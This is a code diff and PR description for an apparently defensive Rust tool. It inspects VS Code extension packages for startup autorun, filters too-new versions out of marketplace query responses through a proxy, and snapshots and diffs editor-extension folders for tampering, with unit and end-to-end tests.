+    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
+        match self {
+            Self::TooLarge { size } => {
+                write!(
+                    f,
+                    "vsix body too large: {size} bytes (cap {MAX_VSIX_BYTES})"
+                )
+            }
+            Self::NotZip(s) => write!(f, "vsix is not a valid zip: {s}"),
+            Self::ManifestTooLarge { size } => {
+                write!(
+                    f,
+                    "extension/package.json too large: {size} bytes (cap {MAX_PACKAGE_JSON_BYTES})"
+                )
+            }
+            Self::ManifestRead(s) => write!(f, "reading extension/package.json: {s}"),
+        }
+    }
+}
+
+impl std::error::Error for VsixInspectError {}
+
+#[derive(Debug, Deserialize)]
+struct ManifestSlice {
+    #[serde(default)]
+    name: Option<String>,
+    #[serde(default)]
+    publisher: Option<String>,
+    #[serde(default)]
+    version: Option<String>,
+    #[serde(default, rename = "activationEvents")]
+    activation_events: Option<Vec<String>>,
+    #[serde(default)]
+    main: Option<String>,
+}
+
+/// Inspect a `.vsix` body. Returns the structured manifest fields
+/// plus a derived `fires_on_startup` flag the proxy uses to decide
+/// audit / block.
+///
+/// Fail-open shape: a `.vsix` we can't *parse* (corrupt zip, missing
+/// manifest, manifest that doesn't deserialise) returns the default
+/// [`VsixInspection`] and the policy layer treats it as "no startup
+/// autorun observed". This matches the npm inspector's behaviour —
+/// defence shouldn't fabricate denials on malformed-but-legitimate
+/// artefacts, and the editor itself will reject a truly broken
+/// `.vsix` regardless. The errors returned are the
+/// definitely-malicious shape: oversized body, oversized manifest.
+pub fn inspect_vsix(body: &[u8]) -> Result<VsixInspection, VsixInspectError> {
+    if body.len() > MAX_VSIX_BYTES {
+        return Err(VsixInspectError::TooLarge { size: body.len() });
+    }
+    // `zip` requires Seek; wrap a Cursor.
+    let cursor = Cursor::new(body);
+    let mut archive = match zip::ZipArchive::new(cursor) {
+        Ok(a) => a,
+        Err(e) => return Err(VsixInspectError::NotZip(e.to_string())),
+    };
+
+    // `.vsix` ships a single `extension/` root with all the
+    // installable bits. `[Content_Types].xml` etc. live at the
+    // archive root but we don't care about them — only the
+    // manifest decides what runs.
+    let mut entry = match archive.by_name("extension/package.json") {
+        Ok(e) => e,
+        Err(zip::result::ZipError::FileNotFound) => {
+            // Same fail-open shape as the npm inspector: a tarball
+            // without a recognisable manifest yields the default
+            // (empty) inspection. Don't punish weird-but-valid
+            // packages.
+            return Ok(VsixInspection::default());
+        }
+        Err(e) => return Err(VsixInspectError::NotZip(e.to_string())),
+    };
+    if entry.size() > MAX_PACKAGE_JSON_BYTES as u64 {
+        return Err(VsixInspectError::ManifestTooLarge { size: entry.size() });
+    }
+    let mut buf = Vec::with_capacity(entry.size() as usize);
+    if let Err(e) = entry.read_to_end(&mut buf) {
+        return Err(VsixInspectError::ManifestRead(e.to_string()));
+    }
+    Ok(parse_manifest(&buf))
+}
+
+fn parse_manifest(body: &[u8]) -> VsixInspection {
+    let m: ManifestSlice = match serde_json::from_slice(body) {
+        Ok(m) => m,
+        Err(_) => return VsixInspection::default(),
+    };
+    let activation_events = m.activation_events.unwrap_or_default();
+    let fires_on_startup = activation_events
+        .iter()
+        .any(|e| e == "*" || e == "onStartupFinished");
+    VsixInspection {
+        name: m.name.unwrap_or_default(),
+        publisher: m.publisher.unwrap_or_default(),
+        version: m.version.unwrap_or_default(),
+        activation_events,
+        main: m.main,
+        fires_on_startup,
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::io::Write;
+    use zip::write::SimpleFileOptions;
+
+    /// Build a synthetic `.vsix`: a zip containing
+    /// `extension/package.json` (the only entry the inspector
+    /// cares about) plus a junk entry to confirm extra files are
+    /// ignored.
+    fn build_vsix(manifest_json: &str) -> Vec<u8> {
+        let mut buf = Vec::new();
+        {
+            let cursor = Cursor::new(&mut buf);
+            let mut zw = zip::ZipWriter::new(cursor);
+            let opts =
+                SimpleFileOptions::default().compression_method(zip::CompressionMethod::Deflated);
+            zw.start_file("[Content_Types].xml", opts).unwrap();
+            zw.write_all(b"<types/>").unwrap();
+            zw.start_file("extension/package.json", opts).unwrap();
+            zw.write_all(manifest_json.as_bytes()).unwrap();
+            zw.start_file("extension/README.md", opts).unwrap();
+            zw.write_all(b"# noise").unwrap();
+            zw.finish().unwrap();
+        }
+        buf
+    }
+
+    #[test]
+    fn extracts_manifest_fields_and_flags_wildcard_activation() {
+        let body = build_vsix(
+            r#"{
+                "name": "evil-ext",
+                "publisher": "attacker",
+                "version": "1.0.0",
+                "main": "./out/extension.js",
+                "activationEvents": ["*"]
+            }"#,
+        );
+        let i = inspect_vsix(&body).unwrap();
+        assert_eq!(i.name, "evil-ext");
+        assert_eq!(i.publisher, "attacker");
+        assert_eq!(i.version, "1.0.0");
+        assert_eq!(i.main.as_deref(), Some("./out/extension.js"));
+        assert_eq!(i.activation_events, vec!["*".to_string()]);
+        assert!(i.fires_on_startup, "wildcard `*` must flag startup autorun");
+        assert!(i.has_startup_autorun());
+    }
+
+    #[test]
+    fn on_startup_finished_also_flags_startup_autorun() {
+        let body = build_vsix(
+            r#"{
+                "name": "x", "publisher": "y", "version": "1.0.0",
+                "activationEvents": ["onStartupFinished"]
+            }"#,
+        );
+        let i = inspect_vsix(&body).unwrap();
+        assert!(i.fires_on_startup);
+    }
+
+    #[test]
+    fn lazy_activation_events_do_not_flag_startup_autorun() {
+        // `onCommand`, `onLanguage`, `workspaceContains`, etc. are
+        // user/file-triggered — they don't run code until the user
+        // does something specific. These must NOT trip the block
+        // signal.
+        let body = build_vsix(
+            r#"{
+                "name": "x", "publisher": "y", "version": "1.0.0",
+                "activationEvents": [
+                  "onCommand:foo.bar",
+                  "onLanguage:rust",
+                  "workspaceContains:**/Cargo.toml"
+                ]
+            }"#,
+        );
+        let i = inspect_vsix(&body).unwrap();
+        assert!(!i.fires_on_startup);
+        assert_eq!(i.activation_events.len(), 3);
+    }
+
+    #[test]
+    fn missing_activation_events_field_is_safe() {
+        // Modern VSCode extensions can omit `activationEvents`
+        // entirely (the `contributes` keys imply lazy activation).
+        // Inspector must treat absence as "no startup autorun".
+        let body = build_vsix(r#"{ "name": "x", "publisher": "y", "version": "1.0.0" }"#);
+        let i = inspect_vsix(&body).unwrap();
+        assert!(!i.fires_on_startup);
+        assert!(i.activation_events.is_empty());
+    }
+
+    #[test]
+    fn missing_manifest_yields_default_inspection_not_error() {
+        // A zip that's parseable but doesn't contain `extension/
+        // package.json` returns a default Inspection. Some
+        // hand-crafted .vsix variants legitimately omit fields;
+        // we don't want to false-positive on weird-but-valid.
+        let mut buf = Vec::new();
+        {
+            let cursor = Cursor::new(&mut buf);
+            let mut zw = zip::ZipWriter::new(cursor);
+            zw.start_file("misc.txt", SimpleFileOptions::default())
+                .unwrap();
+            zw.write_all(b"hi").unwrap();
+            zw.finish().unwrap();
+        }
+        let i = inspect_vsix(&buf).unwrap();
+        assert_eq!(i, VsixInspection::default());
+    }
+
+    #[test]
+    fn malformed_manifest_json_yields_default_inspection() {
+        let body = build_vsix("{not json");
+        let i = inspect_vsix(&body).unwrap();
+        assert_eq!(i, VsixInspection::default());
+    }
+
+    #[test]
+    fn non_zip_input_returns_err_not_zip() {
+        let body = b"this is not a zip file";
+        let err = inspect_vsix(body).unwrap_err();
+        assert!(matches!(err, VsixInspectError::NotZip(_)), "got {err:?}");
+    }
+
+    #[test]
+    fn oversized_body_is_rejected_before_walking() {
+        // The check is a length comparison — we can use a Vec of
+        // any byte content past the cap, no need for it to be
+        // valid zip data.
+        let body = vec![0u8; MAX_VSIX_BYTES + 1];
+        let err = inspect_vsix(&body).unwrap_err();
+        assert!(
+            matches!(err, VsixInspectError::TooLarge { .. }),
+            "got {err:?}"
+        );
+    }
+}

--- a/crates/sakimori-proxy/tests/proxy_vscode_marketplace_e2e.rs
+++ b/crates/sakimori-proxy/tests/proxy_vscode_marketplace_e2e.rs
@@ -1,0 +1,323 @@
+//! End-to-end: VS Code Marketplace `extensionquery` rewriter
+//! exercised over real HTTP through the proxy.
+//!
+//!   client ── HTTP_PROXY ── sakimori_proxy ── upstream
+//!
+//! Mirrors the architecture of [`proxy_http_e2e.rs`] (plain-HTTP
+//! path, no TLS) but POSTs to the two `extensionquery` endpoint
+//! shapes the proxy recognises (Microsoft's `/_apis/public/
+//! gallery/extensionquery` and OpenVSX's `/vscode/gallery/
+//! extensionquery` compatibility shim), and asserts the response
+//! the client sees has too-young `versions[]` entries stripped
+//! while old ones survive.
+//!
+//! Unit tests in `rewrite_vscode.rs` already cover every
+//! algorithmic branch of the rewriter; this file is the only
+//! place we prove the full hyper / hudsucker / `classify_response`
+//! → `RewriteTarget::VscodeExtensionQuery` → body-rewrite pipeline
+//! works on the wire.
+
+use std::sync::Arc;
+use std::time::{Duration, SystemTime, UNIX_EPOCH};
+
+use sakimori_proxy::{ProxyConfig, RegistryHosts, ca::CaFiles};
+use tokio::io::{AsyncReadExt, AsyncWriteExt};
+use tokio::net::TcpListener;
+use tokio::sync::Notify;
+
+fn tmp_config_dir(tag: &str) -> std::path::PathBuf {
+    let nanos = SystemTime::now()
+        .duration_since(UNIX_EPOCH)
+        .map(|d| d.as_nanos())
+        .unwrap_or(0);
+    std::env::temp_dir().join(format!(
+        "sakimori-vscode-e2e-{tag}-{}-{nanos}",
+        std::process::id()
+    ))
+}
+
+/// HTTP/1.1 mock that consumes the request (including a
+/// `Content-Length`-bounded body so the client can flush a POST
+/// cleanly) and returns the canned response body. Connection-per-
+/// request — the proxy opens a fresh upstream connection for each
+/// rewrite candidate, which matches production behaviour.
+async fn spawn_mock_upstream(
+    response_body: Vec<u8>,
+    content_type: &'static str,
+) -> std::net::SocketAddr {
+    let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
+    let addr = listener.local_addr().unwrap();
+    let body = Arc::new(response_body);
+    let ct = content_type.to_string();
+    tokio::spawn(async move {
+        loop {
+            let (mut sock, _peer) = match listener.accept().await {
+                Ok(p) => p,
+                Err(_) => break,
+            };
+            let body = body.clone();
+            let ct = ct.clone();
+            tokio::spawn(async move {
+                let mut buf = Vec::with_capacity(2048);
+                let mut tmp = [0u8; 1024];
+                // Drain headers.
+                let header_end;
+                loop {
+                    match sock.read(&mut tmp).await {
+                        Ok(0) => return,
+                        Ok(n) => {
+                            buf.extend_from_slice(&tmp[..n]);
+                            if let Some(i) = (0..=buf.len().saturating_sub(4))
+                                .find(|&i| &buf[i..i + 4] == b"\r\n\r\n")
+                            {
+                                header_end = i + 4;
+                                break;
+                            }
+                            if buf.len() > 64 * 1024 {
+                                return;
+                            }
+                        }
+                        Err(_) => return,
+                    }
+                }
+                // Parse Content-Length from the request headers so we
+                // can drain the POST body before responding. Without
+                // this the proxy may see EPIPE on the upstream socket
+                // while still trying to forward the request.
+                let header_bytes = &buf[..header_end];
+                let header_str = std::str::from_utf8(header_bytes).unwrap_or("");
+                let content_length: usize = header_str
+                    .lines()
+                    .find_map(|l| {
+                        let mut parts = l.splitn(2, ':');
+                        let k = parts.next()?.trim();
+                        let v = parts.next()?.trim();
+                        if k.eq_ignore_ascii_case("content-length") {
+                            v.parse().ok()
+                        } else {
+                            None
+                        }
+                    })
+                    .unwrap_or(0);
+                let already_have = buf.len() - header_end;
+                if content_length > already_have {
+                    let mut remaining = content_length - already_have;
+                    while remaining > 0 {
+                        match sock.read(&mut tmp).await {
+                            Ok(0) => break,
+                            Ok(n) => remaining = remaining.saturating_sub(n),
+                            Err(_) => break,
+                        }
+                    }
+                }
+                let resp = format!(
+                    "HTTP/1.1 200 OK\r\nContent-Type: {ct}\r\nContent-Length: {}\r\nConnection: close\r\n\r\n",
+                    body.len()
+                );
+                let _ = sock.write_all(resp.as_bytes()).await;
+                let _ = sock.write_all(&body).await;
+                let _ = sock.shutdown().await;
+            });
+        }
+    });
+    addr
+}
+
+async fn spawn_proxy(registries: RegistryHosts) -> std::net::SocketAddr {
+    let listener = TcpListener::bind("127.0.0.1:0").await.unwrap();
+    let addr = listener.local_addr().unwrap();
+    drop(listener);
+
+    let config_dir = tmp_config_dir("proxy");
+    std::fs::create_dir_all(&config_dir).unwrap();
+    let ca_files = CaFiles::at(config_dir);
+
+    let mut cfg = ProxyConfig::default_dev().unwrap();
+    cfg.listen = addr;
+    cfg.min_age = Duration::from_secs(30 * 86_400);
+    cfg.ca_files = ca_files;
+    cfg.registries = registries;
+    cfg.install_log_enabled = false;
+
+    tokio::spawn(async move {
+        if let Err(e) = sakimori_proxy::run(cfg).await {
+            eprintln!("proxy exited: {e:#}");
+        }
+    });
+
+    let ready = Arc::new(Notify::new());
+    let ready2 = ready.clone();
+    tokio::spawn(async move {
+        for _ in 0..150 {
+            if tokio::net::TcpStream::connect(addr).await.is_ok() {
+                ready2.notify_one();
+                return;
+            }
+            tokio::time::sleep(Duration::from_millis(20)).await;
+        }
+    });
+    tokio::time::timeout(Duration::from_secs(5), ready.notified())
+        .await
+        .expect("proxy never came up");
+
+    addr
+}
+
+fn http_post_through_proxy(
+    proxy: std::net::SocketAddr,
+    target_url: &str,
+    body: &[u8],
+) -> (u16, Vec<u8>) {
+    let proxy_spec = format!("http://{proxy}");
+    let agent = ureq::AgentBuilder::new()
+        .proxy(ureq::Proxy::new(&proxy_spec).unwrap())
+        .timeout(Duration::from_secs(10))
+        .build();
+    let resp = agent
+        .post(target_url)
+        .set("Content-Type", "application/json")
+        .send_bytes(body)
+        .expect("client POST through proxy");
+    let status = resp.status();
+    let mut buf = Vec::new();
+    use std::io::Read;
+    resp.into_reader()
+        .take(4 * 1024 * 1024)
+        .read_to_end(&mut buf)
+        .unwrap();
+    (status, buf)
+}
+
+/// Build an `extensionquery` response with one old version and one
+/// young version. The proxy's rewriter, configured with
+/// `--min-age 30d`, should drop the young one and keep the old.
+fn synthetic_extensionquery_json() -> Vec<u8> {
+    let young = (chrono::Utc::now() - chrono::Duration::days(5)).to_rfc3339();
+    let old = "2024-06-01T12:00:00Z";
+    serde_json::to_vec(&serde_json::json!({
+        "results": [{
+            "extensions": [{
+                "publisher": {"publisherName": "ms-vscode"},
+                "extensionName": "vscode-eslint",
+                "versions": [
+                    {"version": "3.0.10", "lastUpdated": young},
+                    {"version": "3.0.9",  "lastUpdated": old},
+                ]
+            }]
+        }]
+    }))
+    .unwrap()
+}
+
+#[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+async fn vscode_marketplace_extensionquery_rewritten_over_real_http() {
+    let upstream = spawn_mock_upstream(synthetic_extensionquery_json(), "application/json").await;
+
+    let registries = RegistryHosts {
+        vscode_marketplace: vec!["127.0.0.1".into()],
+        ..RegistryHosts::default()
+    };
+    let proxy = spawn_proxy(registries).await;
+
+    // Microsoft's canonical path.
+    let url = format!("http://{upstream}/_apis/public/gallery/extensionquery");
+    let (status, body) = tokio::task::spawn_blocking(move || {
+        http_post_through_proxy(proxy, &url, br#"{"filters":[]}"#)
+    })
+    .await
+    .unwrap();
+
+    assert_eq!(status, 200);
+    let parsed: serde_json::Value =
+        serde_json::from_slice(&body).expect("rewritten body is valid JSON");
+    let versions = parsed["results"][0]["extensions"][0]["versions"]
+        .as_array()
+        .expect("versions[] survives rewriting");
+    let kept: Vec<&str> = versions
+        .iter()
+        .map(|v| v["version"].as_str().unwrap())
+        .collect();
+    assert_eq!(kept, vec!["3.0.9"], "young 3.0.10 should be stripped");
+}
+
+#[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+async fn openvsx_vscode_gallery_path_also_rewritten() {
+    // OpenVSX exposes a VS Code-compatibility shim at
+    // `/vscode/gallery/extensionquery`. The proxy must route this
+    // through the same rewriter even though the URL path differs
+    // from Microsoft's `/_apis/...`.
+    let upstream = spawn_mock_upstream(synthetic_extensionquery_json(), "application/json").await;
+    let registries = RegistryHosts {
+        vscode_marketplace: vec!["127.0.0.1".into()],
+        ..RegistryHosts::default()
+    };
+    let proxy = spawn_proxy(registries).await;
+
+    let url = format!("http://{upstream}/vscode/gallery/extensionquery");
+    let (status, body) = tokio::task::spawn_blocking(move || {
+        http_post_through_proxy(proxy, &url, br#"{"filters":[]}"#)
+    })
+    .await
+    .unwrap();
+
+    assert_eq!(status, 200);
+    let parsed: serde_json::Value = serde_json::from_slice(&body).unwrap();
+    let versions = parsed["results"][0]["extensions"][0]["versions"]
+        .as_array()
+        .unwrap();
+    let kept: Vec<&str> = versions
+        .iter()
+        .map(|v| v["version"].as_str().unwrap())
+        .collect();
+    assert_eq!(kept, vec!["3.0.9"]);
+}
+
+#[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+async fn unconfigured_host_passes_extensionquery_through_unrewritten() {
+    // Default registries (no 127.0.0.1 in vscode_marketplace) → the
+    // proxy doesn't recognise this host as a marketplace and the
+    // body reaches the client unchanged. Young version survives.
+    let upstream = spawn_mock_upstream(synthetic_extensionquery_json(), "application/json").await;
+    let proxy = spawn_proxy(RegistryHosts::default()).await;
+
+    let url = format!("http://{upstream}/_apis/public/gallery/extensionquery");
+    let (status, body) = tokio::task::spawn_blocking(move || {
+        http_post_through_proxy(proxy, &url, br#"{"filters":[]}"#)
+    })
+    .await
+    .unwrap();
+    assert_eq!(status, 200);
+    let parsed: serde_json::Value = serde_json::from_slice(&body).unwrap();
+    let versions = parsed["results"][0]["extensions"][0]["versions"]
+        .as_array()
+        .unwrap();
+    assert_eq!(
+        versions.len(),
+        2,
+        "untouched body should keep both versions"
+    );
+}
+
+#[tokio::test(flavor = "multi_thread", worker_threads = 2)]
+async fn unrecognised_path_under_marketplace_host_is_passed_through() {
+    // A request to a non-extensionquery path on a configured
+    // marketplace host falls through `classify_response` and the
+    // upstream body reaches the client byte-for-byte. Important
+    // because the marketplace also serves asset URIs, telemetry
+    // endpoints, etc. that the rewriter must not touch.
+    let canned = br#"{"hello":"world","not":"an extensionquery"}"#.to_vec();
+    let upstream = spawn_mock_upstream(canned.clone(), "application/json").await;
+    let registries = RegistryHosts {
+        vscode_marketplace: vec!["127.0.0.1".into()],
+        ..RegistryHosts::default()
+    };
+    let proxy = spawn_proxy(registries).await;
+
+    let url = format!("http://{upstream}/some/other/path");
+    let (status, body) =
+        tokio::task::spawn_blocking(move || http_post_through_proxy(proxy, &url, br#"{}"#))
+            .await
+            .unwrap();
+    assert_eq!(status, 200);
+    assert_eq!(body, canned, "non-extensionquery body must pass through");
+}

--- a/crates/sakimori/src/cli.rs
+++ b/crates/sakimori/src/cli.rs
@@ -1,4 +1,4 @@
-use std::path::PathBuf;
+use std::path::{Path, PathBuf};
 
 use anyhow::{Context, Result};
 use clap::{Parser, Subcommand, ValueEnum};
@@ -181,6 +181,16 @@ pub enum Command {
         #[command(subcommand)]
         cmd: DaemonCommand,
     },
+    /// Editor-extension tamper detection — the same workspace-
+    /// snapshot model applied to `~/.vscode/extensions/`,
+    /// `~/.cursor/extensions/`, and friends. Auto-detects which
+    /// extension roots exist on the host so a user without Cursor
+    /// doesn't see an empty `cursor-extensions/` namespace polluting
+    /// the diff.
+    Extensions {
+        #[command(subcommand)]
+        cmd: ExtensionsCommand,
+    },
     /// Retroactive CVE notification: read the proxy's install log and
     /// query OSV.dev for advisories that affect installs you've
     /// already done. Local-first — only `(ecosystem, name, version)`
@@ -319,6 +329,64 @@ pub struct DaemonStopArgs {
     /// report is worse than an obvious timeout.
     #[arg(long, default_value_t = 30, value_name = "SECS")]
     pub timeout_secs: u64,
+}
+
+#[derive(Debug, Subcommand)]
+pub enum ExtensionsCommand {
+    /// Walk every editor-extension root that exists on the host and
+    /// emit a merged JSON snapshot. Each file's relative path is
+    /// prefixed with the root's label
+    /// (`vscode-extensions/foo.bar-1.0.0/package.json`) so the same
+    /// extension id under two editors doesn't collide.
+    Snapshot(ExtensionsSnapshotArgs),
+    /// Compare a previously-taken extensions snapshot against the
+    /// current state of the host's editor extension roots. Exits
+    /// non-zero on any drift (suppress with `--allow-drift`). The
+    /// known-IOC scanner runs against every added / modified path
+    /// just like `workspace diff` so sideloaded extensions that
+    /// match catalog rules surface alongside the structural diff.
+    Diff(ExtensionsDiffArgs),
+}
+
+#[derive(Debug, Parser)]
+pub struct ExtensionsSnapshotArgs {
+    /// Output file. `-` (default) writes to stdout.
+    #[arg(long, short = 'o', default_value = "-")]
+    pub output: PathBuf,
+    /// Override `$HOME`. Mostly for tests / CI; production callers
+    /// can leave this and let the OS resolve it.
+    #[arg(long, value_name = "DIR")]
+    pub home: Option<PathBuf>,
+    /// Files larger than this many bytes get a size-only entry
+    /// (no hash). Defaults to the same 64 MiB cap `workspace
+    /// snapshot` uses — large per-extension blobs (binary
+    /// addons, asset packs) don't drown out diff signal.
+    #[arg(long, default_value_t = sakimori_core::tamper::DEFAULT_MAX_FILE_BYTES)]
+    pub max_file_bytes: u64,
+}
+
+#[derive(Debug, Parser)]
+pub struct ExtensionsDiffArgs {
+    /// Baseline snapshot JSON, as produced by
+    /// `sakimori extensions snapshot`.
+    pub baseline: PathBuf,
+    #[arg(long, value_enum, default_value = "text")]
+    pub format: WorkspaceDiffFormat,
+    /// Override `$HOME`. Must match what was passed at snapshot
+    /// time, otherwise added / removed entries fire spuriously.
+    #[arg(long, value_name = "DIR")]
+    pub home: Option<PathBuf>,
+    #[arg(long, default_value_t = sakimori_core::tamper::DEFAULT_MAX_FILE_BYTES)]
+    pub max_file_bytes: u64,
+    /// Don't exit non-zero when drift is found. Useful for
+    /// audit-only invocations.
+    #[arg(long)]
+    pub allow_drift: bool,
+    /// Disable the known-IOC scan that runs against added /
+    /// modified extension files. On by default; the flag is for
+    /// regression-test reproducibility.
+    #[arg(long)]
+    pub no_check_iocs: bool,
 }
 
 #[derive(Debug, Subcommand)]
@@ -1309,7 +1377,157 @@ pub async fn run(cli: Cli) -> Result<()> {
         Command::Advisories {
             cmd: AdvisoriesCommand::Scan(args),
         } => run_advisories_scan(args),
+        Command::Extensions {
+            cmd: ExtensionsCommand::Snapshot(args),
+        } => run_extensions_snapshot(args),
+        Command::Extensions {
+            cmd: ExtensionsCommand::Diff(args),
+        } => run_extensions_diff(args),
     }
+}
+
+fn resolve_home(override_: Option<&Path>) -> Result<PathBuf> {
+    if let Some(p) = override_ {
+        return Ok(p.to_path_buf());
+    }
+    std::env::var_os("HOME")
+        .map(PathBuf::from)
+        .ok_or_else(|| anyhow::anyhow!("HOME environment variable is not set; pass --home"))
+}
+
+fn run_extensions_snapshot(args: ExtensionsSnapshotArgs) -> Result<()> {
+    let home = resolve_home(args.home.as_deref())?;
+    let roots = sakimori_core::editor_extensions::default_roots(&home);
+    if roots.is_empty() {
+        eprintln!(
+            "sakimori: no editor-extension roots found under {} \
+             (looked for ~/.vscode, ~/.cursor, ~/.windsurf, …) — \
+             snapshot will be empty.",
+            home.display(),
+        );
+    }
+    let opts = tamper_options(Vec::new(), args.max_file_bytes);
+    let snap = sakimori_core::editor_extensions::snapshot_roots(&roots, &opts)?;
+    let json = snap.to_json_pretty()?;
+    if args.output.as_os_str() == "-" {
+        println!("{json}");
+    } else {
+        std::fs::write(&args.output, json)
+            .with_context(|| format!("writing {}", args.output.display()))?;
+        eprintln!(
+            "sakimori: wrote extension snapshot ({} files across {} root(s)) to {}",
+            snap.files.len(),
+            roots.len(),
+            args.output.display()
+        );
+    }
+    Ok(())
+}
+
+fn run_extensions_diff(args: ExtensionsDiffArgs) -> Result<()> {
+    let baseline_json = std::fs::read_to_string(&args.baseline)
+        .with_context(|| format!("reading baseline {}", args.baseline.display()))?;
+    let baseline = sakimori_core::tamper::Snapshot::from_json(&baseline_json)?;
+    let home = resolve_home(args.home.as_deref())?;
+    let roots = sakimori_core::editor_extensions::default_roots(&home);
+    let opts = tamper_options(Vec::new(), args.max_file_bytes);
+    let current = sakimori_core::editor_extensions::snapshot_roots(&roots, &opts)?;
+    let dif = sakimori_core::tamper::diff(&baseline, &current);
+
+    // IOC scan runs per-root: the snapshot keys are label-prefixed
+    // virtual paths, but the catalog rules need the actual filesystem
+    // root. Resolve each label back to its root path; paths whose
+    // prefix doesn't correspond to a currently-known root are dropped
+    // — fail-open, since an extension dir that disappeared between
+    // baseline and diff is a legitimate state, not a hidden positive.
+    let ioc_findings = if args.no_check_iocs {
+        Vec::new()
+    } else {
+        let mut hits = Vec::new();
+        for root in &roots {
+            let prefix = std::path::PathBuf::from(&root.label);
+            let scoped: Vec<std::path::PathBuf> = dif
+                .added
+                .iter()
+                .chain(dif.modified.iter().map(|m| &m.path))
+                .filter_map(|p| p.strip_prefix(&prefix).ok().map(|r| r.to_path_buf()))
+                .collect();
+            let mut root_hits = sakimori_core::iocs::scan_paths_in_root(
+                &root.path,
+                scoped.iter().map(std::path::PathBuf::as_path),
+            );
+            // Re-prefix the finding paths back into the merged
+            // namespace so the diff output reads consistently.
+            for h in &mut root_hits {
+                h.path = prefix.join(&h.path);
+            }
+            hits.extend(root_hits);
+        }
+        hits
+    };
+    let ioc_report = sakimori_core::iocs::Report::new(ioc_findings);
+
+    match args.format {
+        WorkspaceDiffFormat::Json => {
+            #[derive(serde::Serialize)]
+            struct Combined<'a> {
+                #[serde(flatten)]
+                diff: &'a sakimori_core::tamper::Diff,
+                iocs: &'a sakimori_core::iocs::Report,
+            }
+            println!(
+                "{}",
+                serde_json::to_string_pretty(&Combined {
+                    diff: &dif,
+                    iocs: &ioc_report,
+                })?
+            );
+        }
+        WorkspaceDiffFormat::Text => {
+            if dif.is_clean() {
+                eprintln!("sakimori: editor extensions clean — no drift");
+            } else {
+                eprintln!(
+                    "sakimori: {} change(s) ({} added, {} modified, {} removed)\n",
+                    dif.total(),
+                    dif.added.len(),
+                    dif.modified.len(),
+                    dif.removed.len(),
+                );
+                for p in &dif.added {
+                    println!("+  {}", p.display());
+                }
+                for m in &dif.modified {
+                    println!("~  {}", m.path.display());
+                }
+                for p in &dif.removed {
+                    println!("-  {}", p.display());
+                }
+            }
+            if !ioc_report.findings.is_empty() {
+                eprintln!(
+                    "\nsakimori: {} known-IOC hit(s) (catalog {})",
+                    ioc_report.findings.len(),
+                    ioc_report.catalog_version,
+                );
+                for f in &ioc_report.findings {
+                    println!("!  [{:?}] {} — {}", f.severity, f.rule_id, f.path.display(),);
+                }
+            }
+        }
+    }
+
+    let high_ioc = ioc_report
+        .findings
+        .iter()
+        .any(|f| matches!(f.severity, sakimori_core::iocs::Severity::High));
+    if high_ioc {
+        std::process::exit(1);
+    }
+    if !dif.is_clean() && !args.allow_drift {
+        std::process::exit(1);
+    }
+    Ok(())
 }
 
 fn run_advisories_scan(args: AdvisoriesScanArgs) -> Result<()> {

--- a/crates/sakimori/src/cli.rs
+++ b/crates/sakimori/src/cli.rs
@@ -51,6 +51,10 @@ fn build_registries(args: &ProxyStartArgs) -> Result<sakimori_proxy::RegistryHos
         crates: normalize_hosts("--cargo-registry-host", &args.cargo_registry_host)?,
         crates_sparse: normalize_hosts("--cargo-sparse-host", &args.cargo_sparse_host)?,
         nuget: normalize_hosts("--nuget-registry", &args.nuget_registry)?,
+        vscode_marketplace: normalize_hosts(
+            "--vscode-marketplace-registry",
+            &args.vscode_marketplace_registry,
+        )?,
     };
     Ok(sakimori_proxy::RegistryHosts::merge(file, cli))
 }
@@ -834,6 +838,13 @@ pub struct ProxyStartArgs {
     /// `api.nuget.org` is always watched.
     #[arg(long = "nuget-registry", value_name = "HOST")]
     pub nuget_registry: Vec<String>,
+    /// Additional VS Code Marketplace / OpenVSX host to watch
+    /// (repeatable). The canonical `marketplace.visualstudio.com`
+    /// and `open-vsx.org` are always watched; this flag covers
+    /// corp-internal extension galleries that speak the same
+    /// `extensionquery` JSON envelope.
+    #[arg(long = "vscode-marketplace-registry", value_name = "HOST")]
+    pub vscode_marketplace_registry: Vec<String>,
     /// TOML file describing the same per-ecosystem host lists.
     /// Layered after the built-in defaults and before the `--*-
     /// registry` CLI flags; all three sources are appended + deduped


### PR DESCRIPTION
## Summary

End-to-end defence for the editor-extension distribution channel (VSCode / Cursor / Windsurf / OpenVSX), motivated by the 2026-05 GitHub-internal-repo compromise (poisoned VS Code extension on an employee device). Seven commits, each landing one slice in priority order. CLAUDE.md roadmap entries #19–#24 are added and progressively marked ✅ as their implementations land.

### What's in this PR

| # | Commit | Layer | What lands |
|---|---|---|---|
| #19 | `1ad7b48` | Runtime attribution | `code` / `cursor` / `windsurf` / `code-server` / `Code Helper (Plugin)` recognised as PackageManager (attribution root). The existing persistence-write rule pack, cloud-secret-egress (#17), and IOC scanner all fire against extension-spawned syscalls for free. |
| #20 | `24d383d` | Fetch (proxy) | `extensionquery` JSON rewriter for `marketplace.visualstudio.com` + `open-vsx.org`. `versions[].lastUpdated` filtered by `--min-age` — pnpm-style silent fallback. `--vscode-marketplace-registry` CLI flag for internal galleries. |
| #23 | `1007a9f` | Workspace IOC | Catalog v2026.05.21 adds `vscode.tasks-folderopen-autorun` ContentNeedle (basename=`tasks.json`, severity High, family `editor-extension`). |
| #24a | `1e31f02` | Sideload tamper | `sakimori-core::editor_extensions` library — auto-discover `~/.vscode`, `~/.cursor`, `~/.windsurf`, `~/.vscode-insiders`, platform `User/globalStorage`; multi-root snapshot via `Snapshot::take` with label-prefixed paths. |
| #24b | `9b32fdd` | Sideload tamper | `sakimori extensions snapshot` / `extensions diff` CLI subcommands. Diff runs the IOC catalog per-root and exit-1s on High-severity hits. |
| docs+e2e | `4f14a3e` | Coverage | README gains an "Editor-extension coverage" section with honest positioning vs marketplace-mirror approaches (no product.json edit, no redistribution — endpoint MITM, same posture as Bitdefender / corporate SSL inspection). New `tests/proxy_vscode_marketplace_e2e.rs` proves the full hyper → classify_response → rewrite chain on the wire (and caught a real wiring bug: parsers_from_hosts was missing VscodeMarketplaceParser, so should_intercept rejected the host before the rewriter could fire). |
